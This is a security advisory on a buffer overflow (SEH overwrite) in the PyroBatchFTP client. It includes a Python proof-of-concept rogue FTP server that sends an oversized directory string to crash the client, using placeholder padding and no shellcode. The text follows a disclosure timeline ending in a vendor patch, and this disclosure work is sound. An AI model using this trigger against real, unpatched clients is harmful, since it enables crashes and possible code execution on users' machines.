Title: PyroBatchFTP Buffer Overflow (SEH Overwrite)
Date Published: 04/10/2017
It is possible to cause a buffer overflow in PyroBatchFTP when the client connects to an FTP server that returns an excessively long current directory string.
Description of Issue
A buffer overflow vulnerability was discovered in the PyroBatchFTP client, version 3.17. The overflow is triggered after a successful login when the server reports a current directory string longer than 2265 characters. With a longer string it is also possible to overwrite the Structured Exception Handler (SEH) record and potentially hijack the execution flow of the application.
The following proof of concept Python script starts a minimal FTP server on the host system.
Connecting to that server with PyroBatchFTP triggers the buffer overflow in the client.
#!/usr/bin/python
# Python 2 script
# Author: Kevin McGuigan
# Author Website: https://www.7elements.co.uk
# Vendor Website: https://www.emtech.com
import socket
import sys

print("Pyro FTP Buffer Overflow (SEH) Server")

# Directory string returned to the client: 2292 bytes of padding, two 4-byte
# marker groups and 800 bytes of trailing data (well over the 2265-byte limit).
buffer = "A" * 2292 + "B" * 4 + "C" * 4 + "D" * 800
port = 21

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("0.0.0.0", port))
    s.listen(5)
    print("[+] FTP server started on port: " + str(port) + "\r\n")
except socket.error as e:
    print("[-] Failed to bind the server to port: " + str(port) + " (" + str(e) + ")\r\n")
    sys.exit(1)

while True:
    conn, addr = s.accept()
    # Minimal FTP login dialogue: banner, USER, PASS, then the oversized
    # "current directory" reply that the client copies into a fixed buffer.
    conn.send('220 Welcome to PyroBatchFTP Overflow!\r\n')
    print(conn.recv(1024))
    conn.send("331 OK\r\n")
    print(conn.recv(1024))
    conn.send('230 OK\r\n')
    print(conn.recv(1024))
    conn.send('220 "' + buffer + '" is current directory\r\n')
This issue has been patched by the vendor; the patch notes are linked from the original advisory.
The latest version of PyroBatchFTP can be found on the EmTec website.
Reported – 16th September 2017
Vendor Response – 18th September 2017
Update Requested – 3rd October 2017
Vendor Response and Patch – 4th October 2017
Advisory Published – 4th October 2017